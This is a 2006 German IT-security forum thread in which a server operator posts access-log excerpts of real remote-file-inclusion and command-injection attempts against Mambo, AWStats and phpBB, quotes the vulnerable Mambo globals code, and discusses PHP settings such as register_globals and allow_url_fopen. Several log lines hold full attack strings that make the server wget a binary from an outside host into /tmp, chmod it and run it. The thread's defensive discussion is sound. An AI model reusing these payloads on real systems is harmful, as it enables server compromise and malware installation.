ebiz-webhosting
- Ad -
php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > IT-Security Forum > IT-Security
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 

 


IT-Security Alles rund um IT-Security aus den Bereichen Hard- und Software

Antwort
 
LinkBack Themen-Optionen Thema bewerten
  #1 (permalink)  
Alt 05-03-2006, 19:01
globqluqqlo
 Junior Member
Links : Onlinestatus : globqluqqlo ist offline
Registriert seit: Feb 2006
Beiträge: 99
globqluqqlo ist zur Zeit noch ein unbeschriebenes Blatt
Standard Mambo PHP vulnerability - (Alles rund um IT-Security)

Auszug aus dem Logfile:
64.195.0.160 - - [05/Mar/2006:04:40:39 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.00.000.00/cmd.gif?&cmd=cd%20/tmp;wget%20219.00.000.00/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 403
(und ähnliche Einträge)
64.195.0.160 - - [05/Mar/2006:04:40:47 +0100] "POST /xmlrpc.php HTTP/1.1" 404 403
64.195.0.160 - - [05/Mar/2006:04:40:48 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 403

Auszug aus (Quelle: http://www.derkeiler.com/Mailing-Lis...5-11/0535.html):

a vulnerability exist in globals.php when register_globals is off and allow
remote code inclusion
this a GLOBALS overwrite
in components/com_content/content.html.php
there is the line:
require_once( $GLOBALS['mosConfig_absolute_path'] .
'/includes/HTML_toolbar.php' );


ok


da globals.php:
if (!ini_get('register_globals')) {
while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value;
while(list($key,$value)=@each($_SESSION)) $GLOBALS[$key]=$value;
foreach($_FILES as $key => $value){
$GLOBALS[$key]=$_FILES[$key]['tmp_name'];
foreach($value as $ext => $value2){
$key2 = $key . '_' . $ext;
$GLOBALS[$key2] = $value2;
}
}
}


da fake protect in mambo.php:


if (in_array( 'globals', array_keys( array_change_key_case( $_REQUEST,
CASE_LOWER ) ) ) ) {
die( 'Fatal error. Global variable hack attempted.' );
}
if (in_array( '_post', array_keys( array_change_key_case( $_REQUEST,
CASE_LOWER ) ) ) ) {
die( 'Fatal error. Post variable hack attempted.' );
}

Eigentlich gibt'z dazu keine Frage,

höchstens ob save_mode=On schützen würde.

Geändert von globqluqqlo (17-03-2006 um 02:14 Uhr)
Mit Zitat antworten
  #2 (permalink)  
Alt 05-03-2006, 23:28
wahsaga
  Moderator
Links : Onlinestatus : wahsaga ist offline
Registriert seit: Sep 2001
Beiträge: 24.486
wahsaga befindet sich auf einem aufstrebenden Ast
Standard Re: Mambo PHP vulnerability - (Alles rund um IT-Security)

Zitat:
Original geschrieben von globqluqqlo
Eigentlich gibt'z dazu keine Frage,

höchstens ob save_mode=On schützen würde.
Davor wirklich schützen würde saubere Programmierung - aber mit der scheinen's die Mambo-Frickler (inzwischen Joomla IIRC, oder ist das nicht betroffen?) ja eh nicht so zu haben, wie die vermehrten Meldungen bzgl. dieses Systems in letzter Zeit zeigen.
Zitat:
this a GLOBALS overwrite
Ja, und absolut hausgemachtes Problem.

Alle möglichen von extern kommenden Parameter so wie im Codeauszug gezeigt in $GLOBALS reinzuballern und dann auch noch anschließend offenbar ungeprüft zu verwenden, kann man ja wirklich schon nicht mehr anders als dämlich nennen.
__________________
I don't believe in rebirth. Actually, I never did in my whole lives.
Mit Zitat antworten
  #3 (permalink)  
Alt 05-03-2006, 23:57
goth
  Moderator
Links : Onlinestatus : goth ist offline
Registriert seit: Mar 2002
Ort: Erde
Beiträge: 7.242
goth ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Wenn man sich diese Codesamples anschaut ist's schon heftig wie dämlich diese Entwickler sind ... naja ... hauptsache OS und für kostnix ... Als Provider bleibt da nur alles dicht machten (also vom Prinzip her die Verwendung solcher Scriptwi*e zu unterbinden) ... oder die Verwender nach vorherigem Hinweis im Schadensfall in Haftung zu nehmen. Nur so kann sowas ausgemerzt werden!
__________________
carpe noctem

Bitte keine Fragen per EMail ... im Forum haben alle was davon ... und ich beantworte EMail-Fragen von Foren-Mitgliedern in der Regel eh nicht!
Hinweis: Ich bin weder Mitglied noch Angestellter von ebiz-consult! Alles was ich hier von mir gebe tue ich in eigener Verantwortung!

http://www.mysqldiff.org
Mit Zitat antworten
  #4 (permalink)  
Alt 13-03-2006, 23:07
globqluqqlo
 Junior Member
Links : Onlinestatus : globqluqqlo ist offline
Registriert seit: Feb 2006
Beiträge: 99
globqluqqlo ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Ich habe ja nur ein paar Stunden port80 aufgemacht. Mich gibt's eigentlich gar nicht, und schon wieder was im log:

219.149.211.2 - - [13/Mar/2006:11:37:46 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20 %2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 403
219.149.211.2 - - [13/Mar/2006:11:37:47 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20 %2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 406
219.149.211.2 - - [13/Mar/2006:11:37:49 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20 %2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 406
219.149.211.2 - - [13/Mar/2006:11:37:54 +0100] "POST /xmlrpc.php HTTP/1.1" 404 403
219.149.211.2 - - [13/Mar/2006:11:37:55 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 403

und noch ein paar weitere POSTS auf Orte, wo xmlrpc.php sein könnte.

Nicht dass ich mich beklagen würde, es nimmt mir die Naivität gerade am Anfang.

heise-news Meldung vom 12.08.2005 11:39

Website-Statistiker AWStats führt beliebige Befehle aus

Die weit verbreitete Website-Statistik-Software AWStats filtert Benutzereingaben nicht richtig und ermöglicht so, mit den Privilegien des Webservers beliebige Systemkommandos auf dem Server auszuführen.

Geändert von globqluqqlo (13-03-2006 um 23:13 Uhr)
Mit Zitat antworten
  #5 (permalink)  
Alt 17-03-2006, 01:43
globqluqqlo
 Junior Member
Links : Onlinestatus : globqluqqlo ist offline
Registriert seit: Feb 2006
Beiträge: 99
globqluqqlo ist zur Zeit noch ein unbeschriebenes Blatt
Standard

130.205.32.7 - - [16/Mar/2006:06:15:42 +0100] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xxxxxxxxxxx/yyyyy?&cmd=cd%20/tmp;wget%20xxxxxxxxxxxx/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403

130.205.32.7 - - [16/Mar/2006:06:15:43 +0100] "GET /modules/includes/functions_admin.php?phpbb_root_path=http://xxxxxxxxxxx/yyyyy?&cmd=cd%20/tmp;wget%20xxxxxxxxxxxxhaita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403

130.205.32.7 - - [16/Mar/2006:06:15:44 +0100] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xxxxxxxxxxx/yyyyy?&cmd=cd%20/tmp;wget%20xxxxxxxxxxxx/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403

130.205.32.7 - - [16/Mar/2006:06:15:46 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://xxxxxxxxxxx/yyyyy?&cmd=cd%20/tmp;wget%20xxxxxxxxxxxx/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403

130.205.32.7 - - [16/Mar/2006:06:15:47 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://xxxxxxxxxxx/yyyyy?&cmd=cd%20/tmp;wget%20xxxxxxxxxxxx/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403

130.205.32.7 - - [16/Mar/2006:06:15:49 +0100] "GET /phpBB2/admin_styles.php?phpbb_root_path=http://xxxxxxxxxxx/yyyyy?&cmd=cd%20/tmp;wget%20xxxxxxxxxxxx/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 404 403

130.205.32.7 - - [16/Mar/2006:06:15:48 +0100] "GET /phpBB2/admin/admin_styles.php?phpbb_root_path=http://xxxxxxxxxxx/yyyyy?&cmd=cd%20/tmp;wget%20xxxxxxxxxxxx/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 200 741

Diese Angriffe - es werden diverse plausible Pfade probiert - auf admin_styles-php und admin_functions.php, neueste Version, beruhen nur auf
- register_globals=On
- allow_url_fopen=On.

Am ersteren ist server selber schuld.

Das zweite ist tückischer. Zum einen wurde es nachträglich in php eingebaut, und es gilt ausser für fopen() auch für require() und include() (darauf beruht die Attacke). Schliesslich ist url_fopen() eine nützliche feature, die auf keine andere, kontrolliertere Art zugänglich ist, zumindest wüsste ich nicht wie.

Zitat:
aus der php-Dokumentation:
allow_url_fopen:
This setting can only be set in php.ini due to security reasons.
Das macht es gerade noch unsicherer - oder überflüssig.

Geändert von globqluqqlo (17-03-2006 um 02:29 Uhr)
Mit Zitat antworten
  #6 (permalink)  
Alt 17-03-2006, 11:43
goth
  Moderator
Links : Onlinestatus : goth ist offline
Registriert seit: Mar 2002
Ort: Erde
Beiträge: 7.242
goth ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Zitat:
Original geschrieben von globqluqqlo
Das macht es gerade noch unsicherer - oder überflüssig.
Wieso?! ... was hast Du denn jetzt schon wieder nicht verstanden?
__________________
carpe noctem

Bitte keine Fragen per EMail ... im Forum haben alle was davon ... und ich beantworte EMail-Fragen von Foren-Mitgliedern in der Regel eh nicht!
Hinweis: Ich bin weder Mitglied noch Angestellter von ebiz-consult! Alles was ich hier von mir gebe tue ich in eigener Verantwortung!

http://www.mysqldiff.org
Mit Zitat antworten
  #7 (permalink)  
Alt 17-03-2006, 21:30
globqluqqlo
 Junior Member
Links : Onlinestatus : globqluqqlo ist offline
Registriert seit: Feb 2006
Beiträge: 99
globqluqqlo ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Zitat:
Original geschrieben von globqluqqlo
Das macht es gerade noch unsicherer - oder überflüssig.

Wieso?! ... was hast Du denn jetzt schon wieder nicht verstanden?
Im grossen und ganzen habe ich es, aber allow_url_fopen ist PHP_INI_SYSTEM.

Setze man im php.ini allow_url_fopen=Off, kann man die wrappermodules nicht brauchen (und man hätte sie gar nicht implementieren müssen) dafür ist man auf der sicheren Seite.

Vielleicht weiss jd wie man die wrappermodules selektiver brauchen kann.

Geändert von globqluqqlo (19-03-2006 um 19:16 Uhr)
Mit Zitat antworten
  #8 (permalink)  
Alt 26-03-2006, 04:16
globqluqqlo
 Junior Member
Links : Onlinestatus : globqluqqlo ist offline
Registriert seit: Feb 2006
Beiträge: 99
globqluqqlo ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Zitat:
Original geschrieben von globqluqqlo
Vielleicht weiss jd wie man die wrappermodules selektiver brauchen kann.
http:// und ftp:// mit CURL.
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

MariaDB 5.5 veröffentlicht
MariaDB 5.5 veröffentlichtDie freie MySQL-Alternative MariaDB wurde in der stabilen Version 5.5.23 veröffentlicht und soll einige Verbesserungen gegenüber Oracles Communityversion von MySQL mitbringen.

16.04.2012 | Berni

Deutsche Yii Framework Community
Deutsche Yii Framework CommunitySeit dem 19.03.2012 gibt es für die Yii PHP Framework Community ein deutsches Zuhause.

20.03.2012 | dhcomputer

 

Aktuelle PHP Scripte

BROM CMS/BelCal 3 ansehen BROM CMS/BelCal 3

Spezielles CMS für Betreiber von Ferienwohnungen. Komplette Seitenerstellung online, Verwaltung mehrerer Objekte, Reservierungssystem mit sofortigem Abgleich im Belegungskalender und vieles mehr bietet dieses Content Management System.

25.05.2012 belcal2 | Kategorie: PHP/ CMS
belbit LiveSupport Script ansehen belbit LiveSupport Script

Schnellen und unkomplizierten Support im LiveSupport-Chat anbieten. Ohne Datenbank und in wenigen Sekunden installiert.

24.05.2012 EichbaumMedia | Kategorie: PHP/ Chat
belbit Ticketcenter-Script ansehen belbit Ticketcenter-Script

Verwalten Sie Supportanfragen zuverlässig im Web2.0-Stil anstatt per E-Mail - inkl. Überprüfung, ob Antworten gelesen wurden und mehr.

24.05.2012 EichbaumMedia | Kategorie: PHP/ Ticketsystem
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 10:55 Uhr.